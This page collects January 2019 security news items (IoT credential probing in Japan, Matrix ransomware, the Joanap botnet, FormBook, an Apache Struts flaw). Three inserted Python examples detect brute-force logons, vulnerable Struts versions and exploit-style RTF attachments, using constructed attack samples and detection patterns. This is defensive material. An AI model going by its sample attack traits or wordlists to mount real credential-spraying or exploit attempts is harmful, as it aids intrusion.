Info Security


Japan to Hack IoT Ahead of 2020 Olympics

Thu, 01/31/2019 - 17:22

The Japanese government approved an amendment to allow government workers to hack into citizens’ internet of things (IoT) devices as part of efforts to improve cybersecurity ahead of the 2020 Tokyo Olympics.

Beginning next month, devices in people’s homes and offices will be subject to government scrutiny: staff at the National Institute of Information and Communications Technology (NICT) will attempt to log in to upwards of 200 million devices, such as routers and webcams, using lists of default and commonly used usernames and passwords, according to NHK World.

According to a report from the Ministry of Internal Affairs and Communications Cyber-Security Office, two-thirds of the cyber attacks in Japan in 2016 targeted IoT devices. The heightened risk to connected devices at high-profile events like the Olympics has sparked a desire to mitigate risks with a heightened degree of urgency.

“IoT security is one of the greatest challenges we face today. IoT has gone unregulated and largely unsecured to date. That, paired with the sheer number and types of the devices being networked and connected to cloud interfaces and on-the-internet APIs and you have a perfect storm. A radical shift in approach is needed,” said Ashish Gupta, CEO, Bugcrowd.

“In Japan, which will soon be hit with an influx of visitors for the Olympic Games, the government has taken decisive action to make its citizens and visitors more secure. It’s not the first time a government has stepped in to help improve security for the country – this approach is similar to what Australia did with the Hajime worm in 2017.

“While this is relatively novel to take this approach at this scale, many organizations take a similar approach – albeit on a smaller scale – and for good reason. Employee negligence when it comes to security is one of the biggest cybersecurity risks to businesses. Having a robust and proactive security posture is critical in today’s climate.”

Categories: Cyber Risk News

Matrix Ransomware: A Threat to Low-Hanging Fruit

Thu, 01/31/2019 - 16:53

In its 2019 Threat Report, Sophos predicted a rise in targeted ransomware attacks. According to new research, Matrix, a copycat targeted ransomware that has been flying under the radar, is one such threat; it has been observed targeting single machines rather than whole networks.

The recent ransomware report, published by SophosLabs, identifies brute-force attacks on weakly secured, internet-exposed Remote Desktop Protocol (RDP) endpoints as the common thread between various strains of targeted ransomware, including Matrix, BitPaymer, Dharma, SamSam and Ryuk.

Matrix doesn't spread through an organization like SamSam, however. “The attackers’ ransom demands are not embedded within the ransom note. Atypically, the threat actors require victims to contact them first, and submit some of the encrypted files from the victim’s computer, and only then provide the victims with a Bitcoin address and the ransom amount,” the report said.

Though not as sophisticated as more popular attacks, Matrix comes equipped with additional tools that help it to carry out its attack.

“The malware executable bundles within itself several payload executables it needs to accomplish its tasks. It uses RDP within the networks it has infected once it has gained a foothold inside the network. Among the embedded components are some free, legitimate systems administrator tools the malware uses to achieve some of its goals,” the report said.

Interestingly, the malware authors seem to lack a level of professionalism notable in other malware authors, such as those who penned SamSam. With Matrix, researchers have seen several changes and mistakes during their monitoring of 96 samples of the malware. In some cases, the authors completely abandoned features that they had experimented with.

Also, the malware doesn’t seem to have a particular geographical distinction. “The country where the most customers encountered the malware was the United States (27.7% of Matrix detections came from the U.S.), followed by Belgium (16.7% of the detections),” the report said, but it has also been detected on machines in Taiwan, Singapore, Germany, Brazil, Chile, South Africa, Canada, and the UK.

The researchers reportedly played the role of a victim and contacted the malicious actors who demanded they pay that day's value of a Bitcoin and refrain from asking "stupid questions." However, "the authors' initial sassy attitude eventually morphed to a kind of desperation, as they continued to email us and dropped their ransom demand by nearly a third after we stopped responding to their messages."


Report: Majority of Small UK Businesses ‘Ignoring GDPR Risks’

Thu, 01/31/2019 - 13:25

Most small businesses in the UK have not updated or reviewed their data security and privacy policies since the GDPR came into force, according to new research from tech firm Appstractor.

The Under Attack: Assessing the struggle of UK SMBs against cyber criminals report assessed the views of 500 IT bosses at small UK companies and revealed the majority are ignoring GDPR risks seven months after the new rules were officially introduced.

Three quarters of those polled said their company is yet to take any action to improve how they store data, with a quarter of businesses having no plans to do so at all.

The findings make for concerning reading, particularly given research published by the Federation of Small Businesses prior to GDPR coming into force which claimed that 90% of small businesses were not GDPR-compliant.

Paul Rosenthal, CEO of Appstractor, said: “Small businesses have long been in denial about the threat they face from cyber-criminals and it seems this denial has carried over into the risk GDPR carries.

“It is not just the financial risk and the fines that can be imposed under GDPR, but businesses now have a responsibility to report a security breach to those whose data has been put at risk. The reputational damage alone of being known as a company that can’t keep its customers’ data safe can be enough to sink a small business before any financial fines are imposed.”

Whatever steps they decide to take, smaller businesses should at least be reviewing how they gather, store and secure customer data to ensure they are as compliant as possible, Rosenthal added. “Unfortunately, it seems many are not taking GDPR seriously enough which could have serious consequences.”


US Launches Major Effort to Disrupt North Korean Botnet

Thu, 01/31/2019 - 10:54

The US authorities have begun notifying victims of a notorious botnet run by North Korean state-sponsored hackers, as their efforts to disrupt the hermit nation's malicious activity increase.

A court order allowed the FBI and officers from the US Air Force Office of Special Investigations (AFOSI) to operate servers mimicking other peers in the Joanap botnet.

This enabled them to map the extent of the botnet and where infected machines are. The next stage is to notify the owners of those machines, most of whom will have no idea they’re unwittingly aiding a foreign power’s hacking campaigns.

The FBI is coordinating this process via ISPs and in some cases direct communications with the individuals, as well as communicating with foreign governments in cases where victims live abroad.

The Joanap botnet has been in operation since 2009, enabled by the first-stage Brambul worm which targets poorly secured Windows machines.

The latter spreads via a list of hard-coded log-in credentials, which it uses to brute-force its way into SMB shares. Once Joanap is dropped it goes on to scan for other potential victims.
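Both the Matrix story above (RDP password guessing) and Brambul’s credential-list spraying against SMB look the same from the defender’s side: a burst of failed logons from one source against one service. The following is an added example, not part of the Sophos report or the DOJ announcement, that flags that pattern in Windows Security event 4625 records. The JSON record layout, the sample log lines and the threshold are constructed assumptions; a real deployment would read an EVTX or SIEM export instead.

```python
"""Brute-force logon detection over Windows Security event 4625 records.

Added example for this page (not from the Sophos or DOJ material). Both
Brambul's SMB credential-list spraying (logon type 3) and the RDP password
guessing behind Matrix (logon type 10) show up as bursts of 4625 failures
from one source. Record layout, sample lines and threshold are constructed
assumptions; a real deployment would read an EVTX or SIEM export."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Logon types a credential-spraying worm or an RDP brute-forcer produces.
LOGON_TYPES = {"3": "network (SMB)", "10": "remote interactive (RDP)"}


def parse_events(lines):
    """Parse newline-delimited JSON records, keeping only well-formed 4625s."""
    events = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # junk line in the export, skip it
        if rec.get("EventID") != 4625:
            continue
        try:
            ts = datetime.strptime(rec["Time"], "%Y-%m-%dT%H:%M:%S")
        except (KeyError, ValueError):
            continue
        events.append({"time": ts,
                       "src": rec.get("IpAddress", "-"),
                       "user": rec.get("TargetUserName", ""),
                       "logon_type": str(rec.get("LogonType", ""))})
    return events


def find_bruteforce(events, window=timedelta(minutes=5), threshold=10):
    """Return {(src, logon_type): summary} for every source whose densest
    `window` holds at least `threshold` failed network or RDP logons."""
    by_key = defaultdict(list)
    for e in events:
        if e["logon_type"] in LOGON_TYPES:
            by_key[(e["src"], e["logon_type"])].append(e)
    alerts = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda x: x["time"])
        best, start = (0, 0, 0), 0            # (count, start_idx, end_idx)
        for end in range(len(evs)):           # sliding window over sorted times
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            if end - start + 1 > best[0]:
                best = (end - start + 1, start, end)
        count, s, e_idx = best
        if count >= threshold:
            hit = evs[s:e_idx + 1]
            alerts[key] = {"vector": LOGON_TYPES[key[1]],
                           "failures": count,
                           "distinct_users": len({x["user"] for x in hit}),
                           "first": hit[0]["time"], "last": hit[-1]["time"]}
    return alerts


def constructed_log():
    """Constructed sample export, not real telemetry: an SMB credential-list
    sweep, an RDP guessing run against Administrator, and benign noise."""
    base = datetime(2019, 1, 30, 2, 0, 0)

    def rec(offset_s, src, user, ltype, eid=4625):
        t = (base + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%S")
        return json.dumps({"EventID": eid, "Time": t, "IpAddress": src,
                           "TargetUserName": user, "LogonType": ltype})

    wordlist = ["Administrator", "admin", "guest", "user", "test", "root",
                "backup", "sql", "oracle", "support", "scan", "Administrator"]
    lines = [rec(i * 7, "203.0.113.5", u, 3) for i, u in enumerate(wordlist)]
    lines += [rec(60 + i * 12, "198.51.100.7", "Administrator", 10) for i in range(15)]
    lines += [rec(30, "10.0.0.12", "jsmith", 2),             # two console typos
              rec(95, "10.0.0.12", "jsmith", 2),
              rec(100, "10.0.0.12", "jsmith", 2, eid=4624),  # a success, ignored
              "not json at all"]
    return lines


def run_demo():
    """Run the detector over the constructed export."""
    return find_bruteforce(parse_events(constructed_log()))


if __name__ == "__main__":
    for (src, ltype), a in sorted(run_demo().items()):
        print(f"{src} {a['vector']}: {a['failures']} failures across "
              f"{a['distinct_users']} user(s), {a['first']} to {a['last']}")
```

The two knobs worth tuning are `window` and `threshold`: Brambul-style sweeps try many usernames from one host in seconds, so a high distinct-user count from one source is the stronger signal for SMB, while RDP guessing tends to hammer one account, which is why the summary reports both numbers.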

The Joanap malware is a fully functional RAT able to receive multiple commands and linked by the US authorities to North Korean "Hidden Cobra" actors.

It enables them to exfiltrate data, drop additional payloads, initialize proxy communications on a compromised Windows device, manage files, processes and nodes and create and delete directories.

According to a US-CERT alert in May 2018, Joanap had been found on 87 compromised network nodes in countries including China, Spain, Sweden, India, Brazil and Iran.

“Our efforts have disrupted state-sponsored cyber-criminals who used malware to establish a computer network that gave them the ability to hack into other computer systems,” said US Attorney Nicola Hanna.

“While the Joanap botnet was identified years ago and can be defeated with anti-virus software, we identified numerous unprotected computers that hosted the malware underlying the botnet. The search warrants and court orders announced today as part of our efforts to eradicate this botnet are just one of the many tools we will use to prevent cyber-criminals from using botnets to stage damaging computer intrusions.”


Airbus Staff Caught in Data Breach

Thu, 01/31/2019 - 10:21

Airbus has revealed it has been the subject of a cyber-attack affecting its commercial aircraft business, which has compromised employee information.

The aerospace giant revealed in a brief statement that it had notified the relevant authorities, mindful of the need to contact GDPR regulators within 72 hours of discovering a breach.

However, there’s not much else to go on.

It claimed that a cyber-incident on the IT systems of its commercial aircraft business resulted in unauthorized access to data.

“This incident is being thoroughly investigated by Airbus’ experts who have taken immediate and appropriate actions to reinforce existing security measures and to mitigate its potential impact, as well as determining its origins,” it continued.

“Investigations are ongoing to understand if any specific data was targeted, however we do know some personal data was accessed. This is mostly professional contact and IT identification details of some Airbus employees in Europe.”

Airbus staffers, of whom there are roughly 130,000 worldwide, have been told to “take all necessary precautions going forward.” However, there’s no word yet on whether the incident was more serious in scope.

Alongside US firm Boeing, the European giant is the world’s leading manufacturer of commercial aircraft for carriers, delivering a record 800 planes to 93 customers in 2018.

That could make its IP of great value to hackers, according to Max Vetter, chief cyber officer at Immersive Labs.

“A huge amount of capital is poured into R&D in such organizations, a cost which malicious actors can circumvent by trying to steal the resulting data,” he argued.

“It is known that some nation states have been using this kind of espionage to speed up the production of technology for years. For this reason, it is crucial that technical countermeasures and cyber-skills are continually refined to keep pace with attackers."

Airbus claimed, however, that the attack had made “no impact” on its commercial operations.

Back in 2015, Airbus was forced to issue an Alert Operator Transmission (AOT) to all operators of a new A400M cargo plane to check the software in their engines, after a fatal crash on a test flight in Spain.


New UK Fraud Rules Set to Empower Victims

Thu, 01/31/2019 - 09:54

New rules come into force in the UK today designed to provide consumers with stronger powers of redress in the event they fall victim to authorized push payment (APP) fraud.

Regulator the Financial Conduct Authority (FCA) has mandated that fraud victims can now complain to the bank that receives funds sent in error to a scammer, as well as their own bank.

Both banks have to receive the complaint, with the consumer able to escalate their case to the Financial Ombudsman Service (FOS) if they’re not happy.

APP fraud occurs when an account holder is tricked into making a payment to another account, such as in BEC or CEO fraud.

There are two main types: with malicious payee fraud the victim authorizes a payment for what they believe to be legitimate purposes, but it’s actually a scam; while in malicious redirection the victim intends to pay a legitimate payee but the fraudster directs them to pay a third party instead.

APP fraud losses jumped 44% between the first half of 2017 and the same period last year to reach £145m in the first six months of 2018, according to UK Finance.

The banking group argued last year that the government should levy a payments tax to create a fund which could be used by the industry to compensate the growing number of victims.

The FOS has claimed in the past that a common strategy of the banks in APP disputes — to blame the customer — is increasingly difficult to do given the sophistication of scams.

A new voluntary code is being drawn up for the industry, which should also clarify when lenders are liable to pay up.

Its provisions will include a duty of care on the part of the banks, including processes to confirm the name on the destination bank account before a payment is sent.

“This industry collaboration is key to tackling fraud and improving outcomes for consumers and businesses alike,” argued Equifax head of ID & fraud, Keith McGill.  

“These new [APP] rules will directly benefit consumers falling victim to this type of fraud by giving them stronger redress with the recipient bank or building society being used by the fraudster, in addition to their own.”


Third-Party Breaches Plague Multiple Industries

Wed, 01/30/2019 - 17:01

From January 25 to 28, 2019, multiple organizations, including Discover Financial Services, Verity Medical Foundation, Verity Health Systems and Allen Chern LLP, have made routine filings in accordance with California state law, reporting cybersecurity incidents that may or may not be data breaches, according to the office of the Attorney General (AG).  

The AG’s website notes, “In some cases the organization that sent the notice is not the one that experienced the breach,” and each of the companies that have filed in the past five days has asserted the information was compromised as a result of some unauthorized activity of a third-party vendor.

“Discover was not breached in this incident and our information and data systems were not compromised. This incident was the result of a merchant data compromise, and not the result of any action by Discover or an intrusion of our customer information systems,” a Discover spokesperson wrote in an email.

“We re-issued cards out of an abundance of caution for our cardholders. Our notices to all customers state that 'this breach did not involve Discover card systems.'”

According to Colin Bastable, CEO of Lucy Security, third parties are the CISO’s Achilles' heel. “It appears to be a classic case of a third party’s failure to protect Discover Card customer data. Discover is not going to feel it, but the buck has stopped somewhere down their food chain.”

Health records and payment card data are some of the most highly sought-after data for sale on the dark web, and “these kind of breaches create a lot of stress on both the issuers’ side and on consumers – regardless of whether an issuer was actually the target of a breach or a merchant in the network,” said Felix Rosbach, product manager at comforte AG.

“It’s crucial to protect sensitive data over the entire data lifecycle – from the POS device to processing to backup. Implementing data-centric security, which means protecting data at the earliest possible point and de-protecting it only when absolutely necessary, is the only way forward.”

Still, enterprises continue to trust that their data is secure when put in the hands of their partners, often without having done a thorough review of the security practices of their downstream vendors.

“Until the market adopts a more sophisticated approach to third-party cyber-risk management that provides visibility at scale and with cost efficiency, these incidents will continue to occur frequently," said Fred Kneip, CEO, CyberGRX.


65 Fortune 100s Downloaded Flawed Apache Struts

Wed, 01/30/2019 - 16:45

Despite the Apache Struts project releasing multiple updates in the nearly two years since the Equifax breach, Sonatype research found that between July and December 2018 two-thirds of the Fortune 100 companies downloaded the same vulnerable version of Apache Struts that was exploited in that breach, the company said in an email.

“According to our analysis of The Central Repository (the de facto repository of Java components, used by all the popular Java build tools as the default source of components), over the last 6 months of 2018 we saw 65 of the Fortune Global 100 download vulnerable versions of Struts,” a spokesperson wrote.

“Beyond Struts, this problem of electively consuming known vulnerable open source components is a large issue that extends across all industries. In 2018, Sonatype (Central report again) and npm reported that 12.1% of Java open source components and 51% of JavaScript npm packages downloaded had known vulnerabilities. Equifax is actually now leading the charge and taking action to manage their software supply chains. While Equifax has changed, too many others haven't learned their lesson; it's clear that the cost of inaction is massive,” according to the spokesperson.

“The scope of companies that are still using CVE-2017-5638 demonstrates the importance of vulnerability identification. A researcher in our Crowd of ethical hackers identified CVE-2017-5638 months before the Equifax breach and submitted that information to one of our customers, a major worldwide financial services company. As a result, the customer remediated the vulnerability before a bad actor could take advantage of it,” said Ashish Gupta, CEO of Bugcrowd.

Vulnerability disclosures are intended to raise awareness and help to mitigate risks. After the Equifax breach, it was expected that more companies would have taken security seriously.  

“We found the same vulnerability in a major credit company’s environment several months before the Equifax breach and helped prioritize and remediate the issue well before the company faced any reputational or financial risk from this vulnerability,” Gupta said.

“Since then we have worked with our researchers and other customers to further protect themselves from the Struts vulnerability successfully. If you haven’t already done so, anyone with Apache Struts in their environment should patch immediately. The best protection against such a breach is a layered defense-in-depth approach, a strong SDL (security development lifecycle) for all application development including a bug bounty. The security research community wants to help organizations find and fix these issues.”
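One concrete check behind the “patch immediately” advice, as an added example that is not Sonatype’s or Bugcrowd’s tooling: scan the output of `mvn dependency:list` for struts2-core versions inside the ranges the Apache S2-045 advisory lists for CVE-2017-5638 (2.3.5 through 2.3.31 and 2.5 through 2.5.10, fixed in 2.3.32 and 2.5.10.1). The dependency listing below is constructed, and the regex assumes Maven’s standard `group:artifact:type:version:scope` line format.

```python
"""Flag vulnerable Apache Struts 2 versions in a Maven dependency listing.

Added example, not Sonatype's or Bugcrowd's tooling. The affected ranges
are those the Apache S2-045 advisory gives for CVE-2017-5638: struts2-core
2.3.5 through 2.3.31 and 2.5 through 2.5.10 (fixed in 2.3.32 / 2.5.10.1).
The listing below is constructed `mvn dependency:list` output."""
import re

AFFECTED_RANGES = [((2, 3, 5), (2, 3, 31)), ((2, 5, 0), (2, 5, 10))]

# Matches "[INFO]    org.apache.struts:struts2-core:jar:2.3.31:compile"
DEP_RE = re.compile(
    r"^(?:\[INFO\]\s+)?(?P<group>[\w.\-]+):(?P<artifact>[\w.\-]+):"
    r"(?P<type>\w+):(?P<version>[\w.\-]+)(?::(?P<scope>\w+))?$")


def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1). Stops at the first non-numeric part and
    pads to three components so that '2.5' compares as 2.5.0."""
    parts = []
    for piece in text.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected(version):
    """True if the version lies inside an S2-045 affected range. Tuple
    comparison puts 2.5.10.1 above 2.5.10, so the fix release is not flagged."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def scan_dependency_list(lines):
    """Return 'group:artifact:version' for every affected struts2-core entry.
    Only struts2-core carries the vulnerable multipart parser; plugins should
    still be moved to the same fixed version in lockstep."""
    findings = []
    for line in lines:
        m = DEP_RE.match(line.strip())
        if not m:
            continue
        if m["group"] != "org.apache.struts" or m["artifact"] != "struts2-core":
            continue
        if is_affected(m["version"]):
            findings.append(f"{m['group']}:{m['artifact']}:{m['version']}")
    return findings


# Constructed listing: one vulnerable module, one patched, one on bare 2.5,
# and a test-scoped fixed version that must not be flagged.
SAMPLE_LISTING = """
[INFO] The following files have been resolved:
[INFO]    org.apache.struts:struts2-core:jar:2.3.31:compile
[INFO]    org.apache.struts:struts2-convention-plugin:jar:2.3.31:compile
[INFO]    org.apache.struts:struts2-core:jar:2.5.10.1:compile
[INFO]    org.apache.struts:struts2-core:jar:2.5:compile
[INFO]    commons-fileupload:commons-fileupload:jar:1.3.2:compile
[INFO]    org.apache.struts:struts2-core:jar:2.3.32:test
""".strip().splitlines()

if __name__ == "__main__":
    for finding in scan_dependency_list(SAMPLE_LISTING):
        print("VULNERABLE (CVE-2017-5638):", finding)
```

Run it against `mvn dependency:list -DoutputFile=deps.txt` in CI and fail the build on any finding; the same version logic applies to a Gradle `dependencies` report once the line parser is swapped.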


Digital Growth Exposes Firms to Complexity and Threats

Wed, 01/30/2019 - 11:23

Digital transformation is exposing organizations to greater IT complexity and cyber-risk, according to new global research from Thales eSecurity.

The security vendor polled 1200 execs with responsibility for IT and data security in nine countries around the world to compile its 2019 Thales Data Threat Report.

It found that over a third (39%) class themselves as belonging to one of the two most advanced digital transformation categories defined by report author IDC. This means they’re either “aggressively disrupting” markets or embedding digital into the enterprise to become more agile.

Nearly all (97%) admitted they will use sensitive data in these emerging technologies. This is a major risk, given that traditional corporate network perimeters are a thing of the past as more fluid cloud and mobile technologies dominate.

It’s also a concern given that these new digital platforms can add greater complexity, according to the vendor. For example, 40% of firms polled are using multiple cloud platforms across SaaS, PaaS and IaaS models.

Respondents also claimed “complexity” was the number one perceived barrier to implementing data security.

It’s perhaps not surprising that 86% of the IT executives surveyed admitted their organization is vulnerable to data security threats, with over a third (34%) claiming they’re “very” or “extremely” at risk.

These aren’t theoretical risks: 60% of respondents claimed to have been breached in the past, including 34% in the past year.

Despite the risks, less than 30% currently use encryption, despite it being one of only two technologies named explicitly in the GDPR.

Organizations are splitting their efforts between different layers of the IT environment, spending on average 36% of their time on networks, 34% on data, and 30% on application security.

The report also warned that only half of global firms expect to see an increase in their IT security budgets.

“Our research shows that no organization is immune from data security threats and, in fact, we found that the most sophisticated organizations are more likely to indicate that they have experienced a data security breach,” argued IDC research VP, Frank Dickson.

“This trend is consistent no matter how we define the sophistication of the audience: those who are spending more on IT security, those for whom data security is a larger portion of their security budget, or those who are further along in their digital transformation journey.”


Global Ransomware Attack Could Cost $193 Billion

Wed, 01/30/2019 - 10:35

A major global ransomware attack could cost organizations an estimated $193bn, with those in the US worst affected, according to a new cyber-risk report.

Bashe attack: Global infection by contagious malware, was produced by the Singapore-based Cyber Risk Management (CyRiM) project, of which Lloyd’s of London and other insurers are founding members.

It paints a scenario not unlike WannaCry or NotPetya, in which a ransomware ‘worm’ goes global, causing untold damage.

The report’s hypothetical attack begins with a malicious email directed at one organization, which is opened, triggering the ransomware download. The malware then spreads itself to connected networks and forwards itself to all contacts.

The report estimates that as many as 600,000 businesses globally could be affected by such an attack, with the resulting financial damage hitting anywhere between $85bn and $193bn.

In the most severe scenario, US organizations lose $89bn, European firms suffer $76bn in losses and those in Asia escape relatively lightly with a $19bn hit.

In this scenario, retail and healthcare (both $25bn) would be the worst affected industries, with payment system disruption crippling commerce and lengthy delays in recovery due to infection of legacy healthcare IT systems.

Manufacturing is the next most impacted sector, suffering $24bn in losses thanks to encryption of production equipment and inventory management systems. This will also have a major knock-on impact for the supply chain, the report claimed.

With a staggering 86% of total economic losses currently uninsured, organizations could be on the hook for $166bn if such an attack hit home, the report concluded.

Ed Macnair, CEO of CensorNet, argued that with the right email security, most organizations could mitigate the risk of a global threat on this scale.

“This research has been based on a phishing attack and the kind of spread they are talking about would be prevented if just a couple of companies had email security in place. The chances are many more than that do,” he claimed.

“Cyber insurance is a good idea to have, but without preventative tools in place it’s the same as insuring your home contents and leaving the door unlocked. It’s there as a back-up and, if you do everything right, shouldn’t be needed.”


Global Police Close Notorious Online Marketplace

Wed, 01/30/2019 - 09:53

Europol and the FBI are celebrating this week after announcing the takedown of a notorious marketplace for breached server credentials.

The xDedic site was first revealed back in 2016 when Kaspersky Lab was tipped off by a European ISP. The security vendor claimed it provided a platform for the trade of log-ins to as many as 70,000 corporate and government servers, starting at just $6.

Users could search for servers by various criteria, including price, OS and geographic location. Affected organizations included hospitals, governments, law firms, universities and many more.

With control of these organizations’ servers, cyber-criminals could launch DDoS, click fraud, crypto-mining and other attacks. It’s claimed that xDedic enabled over $68m in fraud, and those behind the marketplace are said to have made a commission on each sale.

Last year, police in Belgium and Ukraine, backed by Europol, signed a Joint Investigative Team agreement. Together with the FBI, they tracked down and last week seized the servers used by xDedic’s administrators, while Ukrainian police announced key arrests.

The German Bundeskriminalamt also helped with the server seizures, while in the US the FBI was aided by Immigration and Customs Enforcement’s Homeland Security Investigations and the Florida Department of Law Enforcement, alongside the Department of Justice’s Office of International Affairs and the Criminal Division’s Computer Crime and Intellectual Property Section.

While the news is a welcome reminder of the success that can come from co-ordinated law enforcement work, it would be wise not to overstate its significance, according to Hi-Tech Bridge CEO, Ilia Kolochenko.

"Unfortunately, this is just a drop in the ocean of the stolen data market. Other similar markets and platforms of different sizes exist, including more discreet ones where one can buy virtually anything including access to breached law enforcement systems and stolen data. Worse, cyber-criminals will certainly learn a lesson and move their data and servers to other jurisdictions immune to justice,” he argued.

“We should treat the root cause of skyrocketing cybercrime – growing economic inequality and global poverty. Otherwise, while we dig up standalone trees, a dark forest will grow behind. Hopefully, the seized data will shed some light on previously unknown data breaches and help to investigate them." 


Largest DDoS Attack Sent Over 500 Million Packets per Second

Wed, 01/30/2019 - 08:00

A distributed denial-of-service (DDoS) attack observed by Imperva against one of its customers peaked at more than 500 million packets per second (500 Mpps), which the company believes is the largest packets-per-second (PPS) attack on record.

According to research released today, last year’s DDoS attack on GitHub rang in at 1.35 terabits per second, making it the largest DDoS attack ever at the time. According to Imperva, though, the ability to mitigate a DDoS attack has more to do with the number of packets directed at a network than it does with the amount of bandwidth.

“Packets per second is the true measure of the attack intensity, and that is what is difficult to block and recover from,” researchers wrote. “When it comes to DDoS protection, bandwidth is not everything. The most demanding attacks are high-volume PPS attacks, because with more packets to process, you need more network hardware and other resources to mitigate them.”

Attacks with a high packet rate are harder for businesses to absorb than attacks that are merely large in bandwidth, which is why cyber-criminals are deploying attacks as small as 10 Gbps with great success. Akamai researchers came to the same conclusion when they looked back at the DDoS trends of 2018.

“When people think of DDoS attacks, they focus on the outliers, the massive Terabit attacks that generate headlines. But the smaller, more focused attacks can do just as much damage. More importantly, these smaller attacks are actually more common than their larger-scaled counterparts,” said a January 28 Akamai blog post.

In fact, the packet rate of the attack Imperva analyzed was more than four times that of the GitHub attack last year. Exhausting a target’s network resources this way is, the researchers say, easy to achieve.

“A DDoS attack can be launched within a matter of minutes...and overwhelm the vast majority of websites or enterprise networks,” researchers wrote.

In the DDoS attacks Imperva analyzed, “it was the 500 million packets-per-second torrent directed at our customer – the highest volume ever recorded – that made it so intense, and the real challenge to overcome.”


Info-Stealing FormBook Returns in New Campaign

Tue, 01/29/2019 - 18:15

A file-hosting service registered within the last week is being used to spread information-stealing malware in another FormBook campaign, currently attacking retail and hospitality businesses both within and outside of the US, according to Deep Instinct.

Though FormBook itself has been around since approximately 2016, the newly registered file-hosting service used in this campaign is being discussed and shared in underground hacking forums as a recommended service for hosting and serving malware. In a blog post, researchers wrote, “As with many information stealing and credential harvesting malware, FormBook’s infection chain starts with a phishing Email containing a malicious attachment, which is usually an Office document or a PDF file.”

The campaign uses rich text format (RTF) documents and leverages recent Word vulnerabilities as droppers, likely because these are often missed by typical security solutions, according to Deep Instinct. Once the payload is dropped and executed, it will copy itself, then proceed to scan the system for stored passwords in browsers and various other applications before sending the stolen information back.
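As an added example (not Deep Instinct’s detection logic), here is a static triage pass over RTF attachments of the kind the paragraph describes. It flags embedded OLE objects via the \object, \objdata and \objupdate control words (the last tells Word to refresh the object on open, so no click is needed) and the shortened {\rt header that Word accepts but the RTF specification does not. The two sample documents, the control-word list and the score weights are constructed assumptions, not indicators from the campaign.

```python
"""Static triage of RTF attachments (added example, not Deep Instinct's logic).

Flags the traits exploit RTFs of the kind described above commonly carry:
embedded OLE objects (\\object / \\objdata), the \\objupdate control word that
makes Word load the object on open without a click, and a shortened "{\\rt"
header that Word accepts but the RTF spec does not. Samples, control-word
list and score weights are constructed assumptions, not campaign indicators."""
import re


def triage_rtf(data: bytes) -> dict:
    """Return indicators and a verdict for one file's bytes."""
    r = {"is_rtf": False, "mangled_header": False, "ole_objects": 0,
         "objupdate": False, "hex_payload_bytes": 0, "score": 0,
         "verdict": "not-rtf"}
    if not data.startswith(b"{\\rt"):
        return r
    r["is_rtf"] = True
    # Word needs only "{\rt"; anything short of the spec's "{\rtf1" is an evasion hint.
    r["mangled_header"] = not data.startswith(b"{\\rtf1")
    # \b stops "\object" matching longer control words such as "\objectdata".
    r["ole_objects"] = len(re.findall(rb"\\object\b", data))
    r["objupdate"] = b"\\objupdate" in data
    # Decoded size of the hex-encoded object streams: room for a second stage.
    for m in re.finditer(rb"\\objdata\s*([0-9A-Fa-f\s]+)", data):
        r["hex_payload_bytes"] += len(re.sub(rb"\s", b"", m.group(1))) // 2
    score = 2 * r["ole_objects"]
    score += 3 if r["objupdate"] else 0
    score += 2 if r["mangled_header"] else 0
    score += 1 if r["hex_payload_bytes"] > 4096 else 0
    r["score"], r["verdict"] = score, ("suspicious" if score >= 3 else "clean")
    return r


# Constructed samples. The hex in "order.rtf" is only an OLE Package class
# name header, not a payload.
SAMPLES = {
    "invoice.rtf": rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\f0\fs24 Quarterly figures attached.\par}",
    "order.rtf": (rb"{\rt\ansi{\object\objupdate\objemb{\*\objclass Package}"
                  rb"{\*\objdata 01050000020000000b0000005061636b61676500}}}"),
    "report.pdf": b"%PDF-1.4 not an rtf file",
}


def triage_samples():
    """Verdict per constructed sample."""
    return {name: triage_rtf(doc)["verdict"] for name, doc in SAMPLES.items()}


if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        res = triage_rtf(doc)
        print(f"{name}: {res['verdict']} (score {res['score']}, objects {res['ole_objects']}, "
              f"objupdate {res['objupdate']}, mangled header {res['mangled_header']})")
```

This is a mail-gateway or sandbox pre-filter, not a replacement for detonation: a benign RTF with a pasted spreadsheet will also carry \object and \objdata, which is why the header check and \objupdate weigh more than the object count.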

In addition, the malware takes a screenshot of the victim’s desktop, along with monitoring all browsers for user-typed passwords, stealing those as well. It will also act as a keylogger and maintain a log of the user’s keystrokes.

“This time around, [FormBook] is using a new malware-friendly file hosting service, which seems to be quickly gaining popularity among other threat actors. We strongly suggest employing a zero-trust policy with respect to the service DropMyBin until other information becomes available,” researchers wrote.

FormBook’s low price is attractive, and underground forum discussion suggests buyers get a lot for their money: the malware combines sophisticated evasion capabilities with a powerful credential-harvesting mechanism. All of the droppers and payloads discovered in the research are listed among the indicators of compromise (IoCs) in the Deep Instinct post.


Attackers Exploit Zero-Day in WordPress Plugin

Tue, 01/29/2019 - 16:55

Total Donations, a WordPress plugin abandoned by its creator, is being exploited in the wild by attackers leveraging a zero-day vulnerability, according to Wordfence.

Researchers confirmed that malicious actors are able to gain administrative access to affected WordPress sites via the vulnerabilities tracked as CVE-2019-6703, which are present in all versions of the plugin, including the latest, 2.0.5.

“Total Donations was suspended from the CodeCanyon marketplace in late 2017 following a lack of support from the developers, so it had been disabled for over a year when it showed up on my radar. Because of the severity of the issues present in the plugin and the fact that no patch is likely to come, it is our recommendation that site owners delete Total Donations from their sites entirely," Wordfence's Mikey Veenstra wrote in an email. 

"WordPress is typical of many popular platforms where businesses only control a small portion of the code they rely upon,” said Satya Gupta, CTO and co-founder, Virsec. "Ensuring that there is no unpatched or vulnerable code in this stack is nearly impossible. While it’s always a good idea to heed these alerts and disable or patch vulnerable code wherever possible, businesses need application defenses that protect sensitive processes, even if there are underlying flaws."

